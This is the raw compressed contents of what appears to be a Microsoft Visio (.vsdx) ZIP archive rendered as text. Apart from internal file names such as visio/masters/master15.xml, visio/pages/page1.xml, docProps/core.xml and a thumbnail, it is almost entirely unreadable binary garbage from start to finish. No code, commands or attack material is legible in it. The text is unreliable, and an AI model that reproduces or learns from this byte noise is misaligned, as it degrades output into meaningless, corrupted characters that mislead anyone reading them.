qQzU2W@)"H nh3y:G_ƛ}lN'Y^#EMJJU#*R< \F=2`}, y iA qCn}]_f/K0"/\`Z|J6 aM]9F;F ׻tё4!a&|)Yga<$iS,=C,Xchm[˄yZzMIYq<,"j^x@?0#U*@ v@ R\Vm$]Srk#>w_:v7H~m!A202aHQ*xDEtTIB).~ x~QI((uwZ$gG]P"%M:һC&j$镇ZVUx?KRJ`$n멅yAMby]eL1!+ mFEAu?~ ?摞o%kS8QnLXd0X},ag :*3_k_Uv/ IbbE# IE^}ܗ- cfj}Vͅ:L _@#5ΰAKu6ީ6ZP 6Z5&6e6C XܞPS W |Duy]"$J*dے&KwhHyN;Awoejȑ4d^&D泳@QNqE~Z7'x~[ ej",QfMGINT{Lj5}3\? 
µ~4y@ ~8 $TE-,R>5fg'R$;wvL;Ԕ[*MBw #Dh:KpI:;)8qxLǽ@+ٮV5Зvh&-Ae|8|$MR~zh&fK{8A51L8 j?BoF1MjLRSԖoWD&/?΢/6Ӏ˸eDeY[譵jC7RLQk}y^'ci-$-KnVfz@_)vٟ[Xm<]!.kZ,O/PUc%*WKJ]z_}VH,W-o^baX&MaNk۶Mс;}ޚs3`ۡߛŏm·dT0Od^l1aߚr]8Ek6gx&,Jaܢr(> 8Cfco4?4f󹿴KFnmC:ҵ-m8:WW0!ӛi1k|e -~o]bW~N*]֦ZEԹ-nKqm!g0rmKBYPPܱ._YL#HOUa׌${߀ 8w"/⪻EDZB ."|1{K]eN-*zHѶ=VҳrN黅$tAN !ZMO9+ysYgO;2eؗg7߭nnVW; )zz 7r-bn=73(˚Y uKZXvrτ7:O0,f|}_د4c/c`'˧FOrP5@/0{ EfwYp[Wr n(k^\{rz{??~ryvz>Y=2Њi)i"|lŴ<pl,MJόb{zcF5T6\\U]_97F8\7N@X&dˆvد3#9Q* i[UFd@ IBr6zKND$Yao;xǿ7,5ǿkq߶DoզBc<߻o_z8 "썅њ *ؤpn&{YordK52وHp\+-PRRp&i=Vx@iq񎋟ĪC Yca(v3m5+ /Gf(yf]}H'BFMm7۶۾4_\Oůz~=[~>`νI)3v\1to[kQGL%G!0/'qefǤJ#?>gfp~`CRHv)$T1$!9"|pgwOb><;I%D().f-0󱴦gI1 sٻ8n#WTVVnnS)P[$? %CRrw9s{۠#>SETb! z^TCUZh91 ᭻\U9`DIWZTE Em]>|q%wNJR6j}W>ĝÃ=MWt5OW*Wr q`^P:qB{g/g^@'LcMȈ%M_Y. hMg4NS e9u+Ip}J_^м͒ng/񇏷7(vEV7wFC:!d &Sb2%&Sb2%Z 62%$Sli+]Mȳ2>$ p*j*-kxJLQ@PHt2Rjc)&b)&)txbK[ugAP7HŷOPE1,Bc8Gs4˽swa ØX,%}Y+@Q $ XBx@i],k~^3Oaೀ9G#C;vQV>y_i[mwT6YL4!^>3ᘓs)`RJBw`,]K7Ix{.H~{דآK04Dll=Ha 4xj)ǬD:VEMc}s.Jo5VΞ_eCޠ0MaƈLdIX,0̔yXc>iUNXa 7_ A˳ ӣ\@&GH%|6.YI'yM :n3o R{-/[-}!|v'ƴ4Y& a4j͇;u3X%reHS%)fGa njOŗ?țD=%C&6})?JB);pf"NyHڼ`[%HegV2qOGGfb}/G9ÿN_^wyl?./>v~᣷70b#P=P} 2y-ufO F NTAjՒ șJ>< pمQᶘ[%8[γ3t+2=.@LjZfa+>WjĒI}4YM}%ՓhYiE%3hjO?DiئQ[MXw6@r(XZB|n)x (kLKꆖ P ÙP@x;*~grFV[pFGu$W{S=&Ԯ|$C,(%S&zZ%C.X 9ɢ^o3H!I)T#XiHYY!;*D[m"Q "E 4glPQ7K XhNu(Kh>9 )5Lai`DWV?)\Nb~jXH:_#8-exq /O/xz`f|L ie&vsY]-ЛMXCq1n %݌H&'QԖ/U6GY"q0Şr(6*óʞ D?[!ygl!^10Mk}Ic3P 7J9R =S0b.\xb.D=q\8D[Z^^,b{e(6~Een(Vv*~h\4KlnbOxK'{z*eJR&RG6U6i@R^`*eWt.!4i24qhYEM fqMKM(.G#*y.ٸ@I1h^٫U.6k~?eraNkǣ}Ttw##9D>qb3Rˢ ~#aIjvHüs6N(,5b)©œXpWyz.RDA,tiO , "ޖBOSDm(Zl 4&2;3oel쓅{ x{gh.#Zc( u 10."iD@ɠxOfPX< [~fAZJ*FCV /$k`-GB2!va<&B)]zDmB2H0Pv.d'ѱĮ_r!IW`vU5  /9%4A(oYfg0"35ZXQ.n#W'Zp[p/qȰ%*P߻й>$+.X^)r6W1}%|79A[k{MۈE#_V.p!6_H2CGyX-E{7爏/_/1t Kׂ.BkSއ1hr"eȾNBhvJ`&ndLȦ0?x`,z'}[>8W I |$lp֫7mvEo@n6 p`[yAc69|!;:L2FwH>Q^ԡ7&!fƘLt`F0s7 Csbm U lQzRH>w7 ( pיfz0Y&'uS觡5;Τȸ2=<YwK |\tE,QTg;NyAC5fNe{q3wƧ>Gde>".U.֓0Ax[4ACމM63K K{u&Sj~g:z| j Ⱦq\Bi5l 
Ѝ_N!96[#nX䅅3SbKZ4$^z$`AhAv\6zGFۜ:Zvi1SSȟEv|%DЯ`6D,QF@*b"FpKh ?(Uݮn0 `׵m&2ӿ6WVrbRmoFam 0{=OauZF(I1ΟRu8ǰKԵJl}5]=&O.~Vlߞc[xnʣP2Ri S,-Dn]lWЎVoSh1G+yk`+vU& ڵ\,•J.RiPD2h̨ffePUf tK8k LR)BL1VLu\QѿvzX°H}RN*Ղfx7-O0 (cN(NeKwgP[x A-7Q۩TdK/QDe̩~E+4&F6K%i -|V [>l47`+•JaAfQsf\fƲ;Y4r\1-XtQ{|Tn'fˠXVA#[S˖ p+)J1ȇW襅GŚ84UL:_%WMvlŝU0DN+1ZPʈSm+jn$m74KtaZ]MZQD^HH|Bi쉔T,G7y2jIdu|ڊ 4SV"SS(jszU-xDKG9ZZ9uԴAii%E#Ζ[N Dc;eJi-mv+5-ne(qF2bŶ[`˧5-1l]fK'>$[J n@DC+"tIP.Pl #tgkdAC+VGUɅqTJs:)yu 6Fi%"4kQ,t\SfagN0|ZIzPrӦ /#lЧf+(XTi* %[XNl-V-$Դi%Y*zltSgk $[Y4҃իxVuZIrz/R -%[$[cB8[ch%Œ {HH_[ja-..G[.Z~0s-N̤3.J !%c]ԍf։`\}unDݗ7{ܣhÞm};?*l"2tLVs(=[X"+b{Q%˺]MIOm_8$o*%uvY !+f׏)5xghPK!J*visio/masters/master15.xmlXsH~3?LюAPQlc:FQS\eؤ=Jlҹd&y=(N<xIy.^z?K^Ǖ$)8LQ&Iߤi^O D<7 ^:^<շ7DQ/G(+N8^D Z"1M6^PiqQbx+kD(ay~ s#'=}s/Sb+,Kx]oE⦢H]ECNeQ+Jnv:]ёxm̬L5˶&jR@c?w wmNO}MPeռ7)/ Do+zlޞxbW ")Y-Hb1QZ?E?73T4Y|>b0FǯwMx?%iA^}{G:Ǥ#}8JvG_m@v { +lMTMYNn)fzNˣ(_ *>swq$VA,ӌJ! <{wKA+X@e O<=Q'˝rMp {^Zn5!" d!D:8 8 OAlq^؃2Ft1)p6:~rd`&2R9iD2Vkҟ\  RW&!qa5C59֌f#h鰨a.jFǣp 퉮 k[|pFRQeRβW鬥U,q_ Fq|k]4q4 Y5W28tG,iX2Ai5m8Z.Qm3yoE) r-g2Y^afsr=6aXoRS g*y~-LR'tf6b ,ZjcG ibn5pN\s7R:D*껆ϝYNk=^iȋ0X,pNg.qkr㤿w<>:UfK) 4 6rSRl8`p?Iڟ20ɿ+`вeXe2ЉӦ6xf$6"٘)墻.dMحNȲƉá񻚛棋6{_:Q~eye²^،[_VYh([{:-/N/|PK!+[fvisio/windows.xmllTێ0}Ul5ZVBIl߱ y\-W9<Q5{!' xǶȳ~V-Cfe~*{8,*؜ &WҺFtG5|#0H54"OqUQ؋3V_|h5gQkΗ٤*rּˣr6&C \ӏ*5D7.ˑl"۳檪 {G+ ?3b׋}<fJ$0%~cӧNe*E#cu74"=rmO 8QLGNW<PKZNP|,iAOR&apZD>p pLu ?685\h! 
M?;ĺL(`fKPˣAP8'wRPYG;@ Z7h)"y_?GBu⺩`4/xֵog~qUMv/y}">\J]س,s$]~_ e1=bߝŜ{۳Ufź$~1p휓^fųcQcYO<{l6+{]Z=6!CT#TׅjF[NmI仺Gg-wWY1O[ ==SG'kJj__-RmMqi0Q"- 5։Hc)ch_C`u҇l'h5b Wt$ŜhWgiUM!Ѫ1/L|`vWh=; w:xCF)xrݤx1 M1y;ͪ ;^%JPmISRU6ȚxVPQSLR#Dεn!vEo!l8 nc!kj_8wDH/ QsQN[;9"1|ˈ4bD ZZ^bfT8] آT`̞am3'>6 u$&{$Dll&{3jl;Hu+ǔ^>h?v8g*qh[dCA %3?;UIUW o3B6hҰW㛴FsϠ$ż[L$(muCc|JQ SAV'~%IU-at 'Z" ͳsUyG;۾@y h>"V<ο̐o7$9M cHʕH awPU\˶w}ۉۜ zCLЖ] [~'DI8>~ *Y9dwML] ; ^Ez$C?t!Ba"\3BV/D!aK OT%j p~?IƳ%0ٖS6If4 ^35%Dw/]Omp\k%/ζBՐڧm:8Ζ<@vPS@3~D;d~596"H+2zqֿNV!JNz%)@'ŋb*A(Ȥ4[8Qb¼h:CJ)IA1^/_ּ9}]Xj=x6tRo۸%^^,џɧ /H6q^=u!Ig)VږM'xDO:P#̮Y~d5Z]ٞ3^ͽ5-a/ $B,vL  5 IEZIP}y_ruK𡻧sQ`xFz,&P8ɸWv}ADdَd<;ƺA4B(ؿ~s 4u|>KLڿqFc Hڇ$P^}xs](^Gy=o2S/<,,1>f"p% SsmwZoX47iAItl Ƴ{0x6rLz{ _"YexݑP&K@\sqfp^2 "w=#7/tKJ].}G2KK$ %W+u_g/[<6=J\,ufZJK]Yi::I@<ؤEC w&+|w0,X`pN^֒Twhv/ nvc<;K&2v]pqqp. yWN}%S>^y9se _ OߛôYx '-q^W2F}c|nn(2Xb^yzUby$lQ';x|UƮH A<[Bo tuWޏG0kpRrZ裐IƁ9yOd[ 2zl؅^0m_L^52Ť|ނtA(.L7, Szx0SA EIIAh LzEn/ AHC"~GKg W "ۿMD; X-ll/Y|vQ$i]ǃI6=؝ڊ\ǬhqbJېTȖD;$DkK6Y>jj(F4QE 10EfҢ4y;?v}'j40/hN.OܡY;l/jd* Q Z%S3/vgPʗgI= lh~)oXc( aQ{;i`:[ضU/ G#86!KcߠXXMYU&uBvT|~;9hl?~JSWWX!d7 }UYx%$^k6t!ھ9I1Xp>l\>y(&Â_{R]FמsM}gc@S$z{|>,`Og{x1XE$Qt|{O<,M <~=Jl58С<_3<< >QoN>]_ogR03RAs)݂5_&EB߂.HSO[ciA(oI+fNd8vK ut}3 SmQ;уO{h.o IJ6xs4 0|vC'~Nmk'莶F#$jp &]vx;ӻmYnGM5ZZa K/ުxYHӔ7sXi`C]| ) CX +Ӕ/1SP 0@l/_yX'wƺ  Ù=ey/y'xwƛ:N4+޵PDbpcVް(I&%Q,hv,q;VO4M_\YF%,ݱ\´h|\D?rn /PL111״/h?%zN_ЦR|Д -ƣ'88"e YWayHi+F]puiͻ vUrtKCپޣE6kv)>#Y̐st+yhyq2یg_ 6Q뱻_;QیD~j9Tı":YHF6?@@蚵5q:q)P_T):zD&)p%CaA%~̨ MHF)YEX:Cx]uIBCdcT4/ڿE paEI ~_O*wGMZe֬r  d/8~7*f805ce vSlc/B7= }s]ux7sʊVgѴ+h̞C}oxs]1ծo>J%1!dr8%_Ù(u82}|O頴qUPi,6Eʌ+EWk̓:svO1$4$mKVv&p>}b3`.tЙgM'betIH:d!!)Tak|>N5,=[w5/ G 1,MʆTi{"+3?)N Kou$h#T" J):GֿY^_bC2o{PK!)PdocProps/core.xml (n0 d[#qzja7Ub]$H̜hv`CD'77ׇ@-+e`6[swYQZ-[gaˎuj|\<43"X)es?RM8ЁȋEOZ̙3x4Gl>D3 ___?ҨW XѪB-~:)@x=P$Pf!dj`;{t5DG#ԭEu)u.VyމUU'~'么fHȄjl<-onww?I&Wg`G b>!E.\,:N{()jȔVfOVko';4PK!je ddocProps/app.xml (Umo0>iʧC l]W!E*)*$Gؑ}?9)tlsw]S FN0ЉIz}|ur0BB ` .^#k (1Ю,ndp-2k̍fe&Y1|nSHO0+_$G)|1K,钘) 
i1b0NZ"Rƕj'D[K>wdsx}Fn|e` oPG&/Cg/p ZH$/(1JAzw_t9nZo4^GۘԌԧV;͜@E5dkvnx?K\I< x!,4b`|A{p_o`!Hwh,ш:g6A=PK! UrndocProps/custom.xml (Mo0KHH)@fk M*tIKr Ss3c[_};u#||Zyn97}.8Gp^J4visio/masters/master1.xmlPK-!IXT#m@visio/masters/master2.xmlPK-!+xOBvisio/masters/master3.xmlPK-!zyRvisio/masters/master4.xmlPK-!&`M WXvisio/masters/master5.xmlPK-!ZO\visio/masters/master6.xmlPK-!K4 >lvisio/masters/master7.xmlPK-!,֑ ;?wvisio/masters/master8.xmlPK-!0]oO$ >Ivisio/masters/master9.xmlPK-!Tߓw 0?visio/masters/master10.xmlPK-!!< >Svisio/masters/master11.xmlPK-!d1 >ǥvisio/masters/master12.xmlPK-!M 1GP0visio/masters/master13.xmlPK-!˿ ?visio/masters/master14.xmlPK-!\5+o  visio/masters/master17.xmlPK-!t)?Mt visio/masters/master16.xmlPK-!)W visio/pages/page1.xmlPK-!ᗒ  nvisio/pages/_rels/page1.xml.relsPK-!J*Uovisio/masters/master15.xmlPK-!+[fuvisio/windows.xmlPK-!{ =lxvisio/theme/theme1.xmlPK-!: NbdocProps/thumbnail.emfPK-!)PdocProps/core.xmlPK-!je dSdocProps/app.xmlPK-! UrnGdocProps/custom.xmlPK!!